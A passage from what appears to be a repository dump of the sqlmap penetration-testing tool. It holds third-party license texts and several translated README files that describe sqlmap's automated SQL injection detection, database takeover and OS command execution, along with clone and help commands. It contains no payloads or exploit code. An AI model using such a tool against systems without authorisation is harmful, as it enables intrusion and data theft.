the\nLibrary side by side in a single library together with other library\nfacilities that are not Applications and are not covered by this\nLicense, and convey such a combined library under terms of your\nchoice, if you do both of the following:\n\n   a) Accompany the combined library with a copy of the same work based\n   on the Library, uncombined with any other library facilities,\n   conveyed under the terms of this License.\n\n   b) Give prominent notice with the combined library that part of it\n   is a work based on the Library, and explaining where to find the\n   accompanying uncombined form of the same work.\n\n  6. Revised Versions of the GNU Lesser General Public License.\n\n  The Free Software Foundation may publish revised and/or new versions\nof the GNU Lesser General Public License from time to time. Such new\nversions will be similar in spirit to the present version, but may\ndiffer in detail to address new problems or concerns.\n\n  Each version is given a distinguishing version number. If the\nLibrary as you received it specifies that a certain numbered version\nof the GNU Lesser General Public License \"or any later version\"\napplies to it, you have the option of following the terms and\nconditions either of that published version or of any later version\npublished by the Free Software Foundation. If the Library as you\nreceived it does not specify a version number of the GNU Lesser\nGeneral Public License, you may choose any version of the GNU Lesser\nGeneral Public License ever published by the Free Software Foundation.\n\n  If the Library as you received it specifies that a proxy can decide\nwhether future versions of the GNU Lesser General Public License shall\napply, that proxy's public statement of acceptance of any version is\npermanent authorization for you to choose that version for the\nLibrary.\n````\n\n# PSF\n\n* The `Magic` library located under `thirdparty/magic/`.\n  Copyright (C) 2011, Adam Hupp.\n\n````\nPSF LICENSE AGREEMENT FOR PYTHON 2.7.3\n\nThis LICENSE AGREEMENT is between the Python Software Foundation (“PSF”),\nand the Individual or Organization (“Licensee”) accessing and otherwise\nusing Python 2.7.3 software in source or binary form and its associated\ndocumentation.\nSubject to the terms and conditions of this License Agreement, PSF hereby\ngrants Licensee a nonexclusive, royalty-free, world-wide license to\nreproduce, analyze, test, perform and/or display publicly, prepare\nderivative works, distribute, and otherwise use Python 2.7.3 alone or in any\nderivative version, provided, however, that PSF’s License Agreement and\nPSF’s notice of copyright, i.e., “Copyright © 2001-2012 Python Software\nFoundation; All Rights Reserved” are retained in Python 2.7.3 alone or in\nany derivative version prepared by Licensee.\nIn the event Licensee prepares a derivative work that is based on or\nincorporates Python 2.7.3 or any part thereof, and wants to make the\nderivative work available to others as provided herein, then Licensee hereby\nagrees to include in any such work a brief summary of the changes made to\nPython 2.7.3.\nPSF is making Python 2.7.3 available to Licensee on an “AS IS” basis. PSF\nMAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF\nEXAMPLE, BUT NOT LIMITATION, PSF MAKES NO AND DISCLAIMS ANY REPRESENTATION\nOR WARRANTY OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT\nTHE USE OF PYTHON 2.7.3 WILL NOT INFRINGE ANY THIRD PARTY RIGHTS.\nPSF SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF PYTHON 2.7.3 FOR\nANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS A RESULT OF\nMODIFYING, DISTRIBUTING, OR OTHERWISE USING PYTHON 2.7.3, OR ANY DERIVATIVE\nTHEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF.\nThis License Agreement will automatically terminate upon a material breach\nof its terms and conditions.\nNothing in this License Agreement shall be deemed to create any relationship\nof agency, partnership, or joint venture between PSF and Licensee. This\nLicense Agreement does not grant permission to use PSF trademarks or trade\nname in a trademark sense to endorse or promote products or services of\nLicensee, or any third party.\nBy copying, installing or otherwise using Python 2.7.3, Licensee agrees to\nbe bound by the terms and conditions of this License Agreement.\n````\n\n# MIT\n\n* The `bottle` web framework library located under `thirdparty/bottle/`.\n  Copyright (C) 2012, Marcel Hellkamp.\n* The `identYwaf` library located under `thirdparty/identywaf/`.\n  Copyright (C) 2019-2020, Miroslav Stampar.\n* The `ordereddict` library located under `thirdparty/odict/`.\n  Copyright (C) 2009, Raymond Hettinger.\n* The `six` Python 2 and 3 compatibility library located under `thirdparty/six/`.\n  Copyright (C) 2010-2018, Benjamin Peterson.\n* The `Termcolor` library located under `thirdparty/termcolor/`.\n  Copyright (C) 2008-2011, Volvox Development Team.\n\n````\nPermission is hereby granted, free of charge, to any person obtaining\na copy of this software and associated documentation files (the\n\"Software\"), to deal in the Software without restriction, including\nwithout limitation the rights to use, copy, modify, merge, publish,\ndistribute, sublicense, and/or sell copies of the Software, and to\npermit persons to whom the Software is furnished to do so, subject to\nthe following conditions:\n\nThe above copyright notice and this permission notice shall be\nincluded in all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\nEXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\nMERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\nNONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE\nLIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION\nOF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION\nWITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\n````\n\n# Public domain\n\n* The `PyDes` library located under `thirdparty/pydes/`.\n   Copyleft 2009, Todd Whiteman.\n* The `win_inet_pton` library located under `thirdparty/wininetpton/`.\n   Copyleft 2014, Ryan Vennell.\n"
  },
  {
    "path": "sqlmap/doc/translations/README-bg-BG.md",
    "content": "# sqlmap ![](https://i.imgur.com/fe85aVR.png)\n\n[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)\n\nsqlmap e инструмент за тестване и проникване, с отворен код, който автоматизира процеса на откриване и използване на недостатъците на SQL база данните чрез SQL инжекция, която ги взима от сървъра. Снабден е с мощен детектор, множество специални функции за най-добрия тестер и широк спектър от функции, които могат да се използват за множество цели - извличане на данни от базата данни, достъп до основната файлова система и изпълняване на команди на операционната система.\n\nДемо снимки\n----\n\n![Снимка на екрана](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)\n\nМожете да посетите [колекцията от снимки на екрана](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), показващи някои  функции, качени на wiki.\n\nИнсталиране\n----\n\nМоже да изтеглине най-новите tar архиви като кликнете [тук](https://github.com/sqlmapproject/sqlmap/tarball/master) или най-новите zip архиви като кликнете [тук](https://github.com/sqlmapproject/sqlmap/zipball/master).\n\nЗа предпочитане е да изтеглите sqlmap като клонирате [Git](https://github.com/sqlmapproject/sqlmap) хранилището:\n\n    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev\n\nsqlmap работи самостоятелно с [Python](https://www.python.org/download/) версия **2.6**, **2.7** и **3.x** на всички платформи.\n\nИзползване\n----\n\nЗа да получите списък с основните опции използвайте:\n\n    python sqlmap.py -h\n\nЗа да получите списък с всички опции използвайте:\n\n    python sqlmap.py -hh\n\nМоже да намерите пример за използване на sqlmap [тук](https://asciinema.org/a/46601).\nЗа да разберете възможностите на sqlmap, списък на поддържаните функции и описание на всички опции, заедно с примери, се препоръчва да се разгледа [упътването](https://github.com/sqlmapproject/sqlmap/wiki/Usage).\n\nВръзки\n----\n\n* Начална страница: https://sqlmap.org\n* Изтегляне: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)\n* RSS емисия: https://github.com/sqlmapproject/sqlmap/commits/master.atom\n* Проследяване на проблеми и въпроси: https://github.com/sqlmapproject/sqlmap/issues\n* Упътване: https://github.com/sqlmapproject/sqlmap/wiki\n* Често задавани въпроси (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ\n* Twitter: [@sqlmap](https://twitter.com/sqlmap)\n* Демо: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)\n* Снимки на екрана: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots\n"
  },
  {
    "path": "sqlmap/doc/translations/README-de-GER.md",
    "content": "# sqlmap ![](https://i.imgur.com/fe85aVR.png)\n\n[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)\n\nsqlmap ist ein quelloffenes Penetrationstest Werkzeug, das die Entdeckung, Ausnutzung und Übernahme von SQL injection Schwachstellen automatisiert. Es kommt mit einer mächtigen Erkennungs-Engine, vielen Nischenfunktionen für den ultimativen Penetrationstester und einem breiten Spektrum an Funktionen von Datenbankerkennung, abrufen von Daten aus der Datenbank, zugreifen auf das unterliegende Dateisystem bis hin zur Befehlsausführung auf dem Betriebssystem mit Hilfe von out-of-band Verbindungen.\n\nScreenshots\n---\n\n![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)\n\nDu kannst eine [Sammlung von Screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), die einige der Funktionen demonstrieren, auf dem Wiki einsehen.\n\nInstallation\n---\n\n[Hier](https://github.com/sqlmapproject/sqlmap/tarball/master) kannst du das neueste TAR-Archiv herunterladen und [hier](https://github.com/sqlmapproject/sqlmap/zipball/master) das neueste ZIP-Archiv.\n\nVorzugsweise kannst du sqlmap herunterladen, indem du das [GIT](https://github.com/sqlmapproject/sqlmap) Repository klonst:\n\n    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev\n    \nsqlmap funktioniert sofort mit den [Python](https://www.python.org/download/) Versionen 2.6, 2.7 und 3.x auf jeder Plattform.\n\nBenutzung\n---\n\nUm eine Liste aller grundsätzlichen Optionen und Switches zu bekommen, nutze diesen Befehl:\n\n    python sqlmap.py -h\n    \nUm eine Liste alles Optionen und Switches zu bekommen, nutze diesen Befehl:\n\n    python sqlmap.py -hh\n    \nEin Probelauf ist [hier](https://asciinema.org/a/46601) zu finden. Um einen Überblick über sqlmap's Fähigkeiten, unterstütze Funktionen und eine Erklärung aller Optionen und Switches, zusammen mit Beispielen, zu erhalten, wird das [Benutzerhandbuch](https://github.com/sqlmapproject/sqlmap/wiki/Usage) empfohlen.\n\nLinks\n---\n\n* Webseite: https://sqlmap.org\n* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)\n* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom\n* Problemverfolgung: https://github.com/sqlmapproject/sqlmap/issues\n* Benutzerhandbuch: https://github.com/sqlmapproject/sqlmap/wiki\n* Häufig gestellte Fragen (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ\n* Twitter: [@sqlmap](https://twitter.com/sqlmap)\n* Demonstrationen: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)\n* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots\n"
  },
  {
    "path": "sqlmap/doc/translations/README-es-MX.md",
    "content": "# sqlmap ![](https://i.imgur.com/fe85aVR.png)\n\n[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)\n\nsqlmap es una herramienta para pruebas de penetración \"penetration testing\" de software libre que automatiza el proceso de detección y explotación de fallos mediante inyección de SQL además de tomar el control de servidores de bases de datos. Contiene un poderoso motor de detección, así como muchas de las funcionalidades escenciales para el \"pentester\" y una amplia gama de opciones desde la recopilación de información para identificar el objetivo conocido como \"fingerprinting\" mediante la extracción de información de la base de datos, hasta el acceso al sistema de archivos subyacente para ejecutar comandos en el sistema operativo a través de conexiones alternativas conocidas como \"Out-of-band\".\n\nCapturas de Pantalla\n---\n![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)\n\nVisita la [colección de capturas de pantalla](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) que demuestra algunas de las características en la documentación(wiki).\n\nInstalación\n---\n\nSe puede descargar el \"tarball\" más actual haciendo clic [aquí](https://github.com/sqlmapproject/sqlmap/tarball/master) o el \"zipball\" [aquí](https://github.com/sqlmapproject/sqlmap/zipball/master).\n\nPreferentemente, se puede descargar sqlmap clonando el repositorio [Git](https://github.com/sqlmapproject/sqlmap):\n\n    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev\n\nsqlmap funciona con las siguientes versiones de [Python](https://www.python.org/download/) **2.6**, **2.7** y **3.x** en cualquier plataforma.\n\nUso\n---\n\nPara obtener una lista de opciones básicas: \n\n    python sqlmap.py -h\n\nPara obtener una lista de todas las opciones:\n\n    python sqlmap.py -hh\n\nSe puede encontrar una muestra de su funcionamiento [aquí](https://asciinema.org/a/46601).\nPara obtener una visión general de las capacidades de sqlmap, así como un listado funciones soportadas y descripción de todas las opciones y modificadores, junto con ejemplos, se recomienda consultar el [manual de usuario](https://github.com/sqlmapproject/sqlmap/wiki/Usage).\n\nEnlaces\n---\n\n* Página principal: https://sqlmap.org \n* Descargar: [. tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) o [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)\n* Fuente de Cambios \"Commit RSS feed\": https://github.com/sqlmapproject/sqlmap/commits/master.atom\n* Seguimiento de problemas \"Issue tracker\": https://github.com/sqlmapproject/sqlmap/issues\n* Manual de usuario: https://github.com/sqlmapproject/sqlmap/wiki\n* Preguntas frecuentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ\n* Twitter: [@sqlmap](https://twitter.com/sqlmap)\n* Demostraciones: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)\n* Imágenes: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots\n"
  },
  {
    "path": "sqlmap/doc/translations/README-fa-IR.md",
    "content": "# sqlmap ![](https://i.imgur.com/fe85aVR.png)\n\n[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)\n\n\n<div dir=rtl>\n\n\n\nبرنامه `sqlmap`، یک برنامه‌ی تست نفوذ منبع باز است که فرآیند تشخیص و اکسپلویت پایگاه های داده با مشکل امنیتی SQL Injection را بطور خودکار انجام می دهد. این برنامه مجهز به موتور تشخیص قدرتمندی می‌باشد. همچنین داری طیف گسترده‌ای از اسکریپت ها می‌باشد که برای متخصصان تست نفوذ کار کردن با بانک اطلاعاتی را راحتر می‌کند. از جمع اوری اطلاعات درباره بانک داده تا دسترسی به داده های سیستم و اجرا دستورات از طریق ارتباط Out Of Band درسیستم عامل را امکان پذیر می‌کند.\n\n\nتصویر محیط ابزار\n----\n\n\n<div dir=ltr>\n\n\n\n![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)\n\n\n<div dir=rtl>\n\nبرای نمایش [مجموعه ای از اسکریپت‌ها](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) می‌توانید از دانشنامه دیدن کنید.\n\n\nنصب\n----\n\nبرای دانلود اخرین نسخه tarball، با کلیک در [اینجا](https://github.com/sqlmapproject/sqlmap/tarball/master) یا دانلود اخرین نسخه zipball با کلیک در [اینجا](https://github.com/sqlmapproject/sqlmap/zipball/master) میتوانید این کار را انجام دهید.\n\n\nنحوه استفاده\n----\n\n\nبرای دریافت لیست ارگومان‌های اساسی می‌توانید از دستور زیر استفاده کنید:\n\n\n\n<div dir=ltr>\n\n\n```\n    python sqlmap.py -h\n```\n\n    \n    \n    \n<div dir=rtl>\n    \n    \nبرای دریافت لیست تمامی ارگومان‌ها می‌توانید از دستور زیر استفاده کنید:\n\n<div dir=ltr>\n\n    \n```\n    python sqlmap.py -hh\n```\n    \n    \n<div dir=rtl>\n    \n\nبرای اجرای سریع و ساده ابزار می توانید از [اینجا](https://asciinema.org/a/46601) استفاده کنید. برای دریافت اطلاعات بیشتر در رابطه با قابلیت ها ، امکانات قابل پشتیبانی و لیست کامل امکانات و دستورات همراه با مثال می‌ توانید به [راهنمای](https://github.com/sqlmapproject/sqlmap/wiki/Usage) `sqlmap` سر بزنید.\n\n\nلینک‌ها\n----\n\n\n* خانه: https://sqlmap.org\n* دانلود: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) یا [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)\n* نظرات: https://github.com/sqlmapproject/sqlmap/commits/master.atom\n* پیگیری مشکلات: https://github.com/sqlmapproject/sqlmap/issues\n* راهنمای کاربران: https://github.com/sqlmapproject/sqlmap/wiki\n* سوالات متداول: https://github.com/sqlmapproject/sqlmap/wiki/FAQ\n* توییتر: [@sqlmap](https://twitter.com/sqlmap)\n* رسانه: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)\n* تصاویر: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots\n"
  },
  {
    "path": "sqlmap/doc/translations/README-fr-FR.md",
    "content": "# sqlmap ![](https://i.imgur.com/fe85aVR.png)\n\n[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)\n\n**sqlmap** est un outil Open Source de test d'intrusion. Cet outil permet d'automatiser le processus de détection et d'exploitation des failles d'injection SQL afin de prendre le contrôle des serveurs de base de données. __sqlmap__ dispose d'un puissant moteur de détection utilisant les techniques les plus récentes et les plus dévastatrices de tests d'intrusion comme L'Injection SQL, qui permet d'accéder à la base de données, au système de fichiers sous-jacent et permet aussi l'exécution des commandes sur le système d'exploitation.\n\n----\n\n![Les Captures d'écran](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)\n\nLes captures d'écran disponible [ici](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) démontrent des fonctionnalités de __sqlmap__.\n\nInstallation\n----\n\nVous pouvez télécharger le fichier \"tarball\" le plus récent en cliquant [ici](https://github.com/sqlmapproject/sqlmap/tarball/master). Vous pouvez aussi télécharger l'archive zip la plus récente [ici](https://github.com/sqlmapproject/sqlmap/zipball/master).\n\nDe préférence, télécharger __sqlmap__ en le [clonant](https://github.com/sqlmapproject/sqlmap):\n\n    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev\n\nsqlmap fonctionne sur n'importe quel système d'exploitation avec la version **2.6**, **2.7** et **3.x** de [Python](https://www.python.org/download/)\n\nUtilisation\n----\n\nPour afficher une liste des fonctions de bases et des commutateurs (switches), tapez:\n\n    python sqlmap.py -h\n\nPour afficher une liste complète des options et des commutateurs (switches), tapez:\n\n    python sqlmap.py -hh\n\nVous pouvez regarder une vidéo [ici](https://asciinema.org/a/46601) pour plus d'exemples.\nPour obtenir un aperçu des ressources de __sqlmap__, une liste des fonctionnalités prises en charge, la description de toutes les options, ainsi que des exemples, nous vous recommandons de consulter [le wiki](https://github.com/sqlmapproject/sqlmap/wiki/Usage).\n\nLiens\n----\n\n* Page d'acceuil: https://sqlmap.org\n* Téléchargement: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)\n* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom\n* Suivi des issues: https://github.com/sqlmapproject/sqlmap/issues\n* Manuel de l'utilisateur: https://github.com/sqlmapproject/sqlmap/wiki\n* Foire aux questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ\n* Twitter: [@sqlmap](https://twitter.com/sqlmap)\n* Démonstrations: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)\n* Les captures d'écran: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots\n"
  },
  {
    "path": "sqlmap/doc/translations/README-gr-GR.md",
    "content": "# sqlmap ![](https://i.imgur.com/fe85aVR.png)\n\n[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)\n\nΤο sqlmap είναι πρόγραμμα ανοιχτού κώδικα, που αυτοματοποιεί την εύρεση και εκμετάλλευση ευπαθειών τύπου SQL Injection σε βάσεις δεδομένων. Έρχεται με μια δυνατή μηχανή αναγνώρισης ευπαθειών, πολλά εξειδικευμένα χαρακτηριστικά για τον απόλυτο penetration tester όπως και με ένα μεγάλο εύρος επιλογών αρχίζοντας από την αναγνώριση της βάσης δεδομένων, κατέβασμα δεδομένων της βάσης, μέχρι και πρόσβαση στο βαθύτερο σύστημα αρχείων και εκτέλεση εντολών στο απευθείας στο λειτουργικό μέσω εκτός ζώνης συνδέσεων.\n\nΕικόνες\n----\n\n![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)\n\nΜπορείτε να επισκεφτείτε τη [συλλογή από εικόνες](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) που επιδεικνύουν κάποια από τα χαρακτηριστικά.\n\nΕγκατάσταση\n----\n\nΈχετε τη δυνατότητα να κατεβάσετε την τελευταία tarball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/tarball/master) ή την τελευταία zipball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/zipball/master).\n\nΚατά προτίμηση, μπορείτε να κατεβάσετε το sqlmap κάνοντας κλώνο το [Git](https://github.com/sqlmapproject/sqlmap) αποθετήριο:\n\n    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev\n\nΤο sqlmap λειτουργεί χωρίς περαιτέρω κόπο με την [Python](https://www.python.org/download/) έκδοσης **2.6**, **2.7** και **3.x** σε όποια πλατφόρμα.\n\nΧρήση\n----\n\nΓια να δείτε μια βασική λίστα από επιλογές πατήστε:\n\n    python sqlmap.py -h\n\nΓια να πάρετε μια λίστα από όλες τις επιλογές πατήστε:\n\n    python sqlmap.py -hh\n\nΜπορείτε να δείτε ένα δείγμα λειτουργίας του προγράμματος [εδώ](https://asciinema.org/a/46601).\nΓια μια γενικότερη άποψη των δυνατοτήτων του sqlmap, μια λίστα των υποστηριζόμενων χαρακτηριστικών και περιγραφή για όλες τις επιλογές, μαζί με παραδείγματα, καλείστε να συμβουλευτείτε το [εγχειρίδιο χρήστη](https://github.com/sqlmapproject/sqlmap/wiki/Usage).\n\nΣύνδεσμοι\n----\n\n* Αρχική σελίδα: https://sqlmap.org\n* Λήψεις: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ή [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)\n* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom\n* Προβλήματα: https://github.com/sqlmapproject/sqlmap/issues\n* Εγχειρίδιο Χρήστη: https://github.com/sqlmapproject/sqlmap/wiki\n* Συχνές Ερωτήσεις (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ\n* Twitter: [@sqlmap](https://twitter.com/sqlmap)\n* Demos: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)\n* Εικόνες: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots\n"
  },
  {
    "path": "sqlmap/doc/translations/README-hr-HR.md",
    "content": "# sqlmap ![](https://i.imgur.com/fe85aVR.png)\n\n[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)\n\nsqlmap je alat namijenjen za penetracijsko testiranje koji automatizira proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije te preuzimanje poslužitelja baze podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko dohvaćanja podataka iz baze, do pristupa zahvaćenom datotečnom sustavu i izvršavanja komandi na operacijskom sustavu korištenjem tzv. \"out-of-band\" veza.\n\nSlike zaslona\n----\n\n![Slika zaslona](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)\n\nMožete posjetiti [kolekciju slika zaslona](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) gdje se demonstriraju neke od značajki na wiki stranicama.\n\nInstalacija\n----\n\nMožete preuzeti zadnji tarball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/tarball/master) ili zadnji zipball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/zipball/master).\n\nPo mogućnosti, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sqlmapproject/sqlmap) repozitorija:\n\n    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev\n\nsqlmap radi bez posebnih zahtjeva korištenjem [Python](https://www.python.org/download/) verzije **2.6**, **2.7** i/ili **3.x** na bilo kojoj platformi.\n\nKorištenje\n----\n\nKako biste dobili listu osnovnih opcija i prekidača koristite:\n\n    python sqlmap.py -h\n\nKako biste dobili listu svih opcija i prekidača koristite:\n\n    python sqlmap.py -hh\n\nMožete pronaći primjer izvršavanja [ovdje](https://asciinema.org/a/46601).\nKako biste dobili pregled mogućnosti sqlmap-a, liste podržanih značajki te opis svih opcija i prekidača, zajedno s primjerima, preporučen je uvid u [korisnički priručnik](https://github.com/sqlmapproject/sqlmap/wiki/Usage).\n\nPoveznice\n----\n\n* Početna stranica: https://sqlmap.org\n* Preuzimanje: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ili [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)\n* RSS feed promjena u kodu: https://github.com/sqlmapproject/sqlmap/commits/master.atom\n* Prijava problema: https://github.com/sqlmapproject/sqlmap/issues\n* Korisnički priručnik: https://github.com/sqlmapproject/sqlmap/wiki\n* Najčešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ\n* Twitter: [@sqlmap](https://twitter.com/sqlmap)\n* Demo: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)\n* Slike zaslona: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots\n"
  },
  {
    "path": "sqlmap/doc/translations/README-id-ID.md",
    "content": "# sqlmap ![](https://i.imgur.com/fe85aVR.png)\n\n[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)\n\nsqlmap merupakan alat _(tool)_ bantu _open source_ dalam melakukan tes penetrasi yang mengotomasi proses deteksi dan eksploitasi kelemahan _SQL injection_ dan pengambil-alihan server basis data. sqlmap dilengkapi dengan pendeteksi canggih, fitur-fitur handal bagi _penetration tester_, beragam cara untuk mendeteksi basis data, hingga mengakses _file system_ dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_. \n\nTangkapan Layar\n----\n\n![Tangkapan 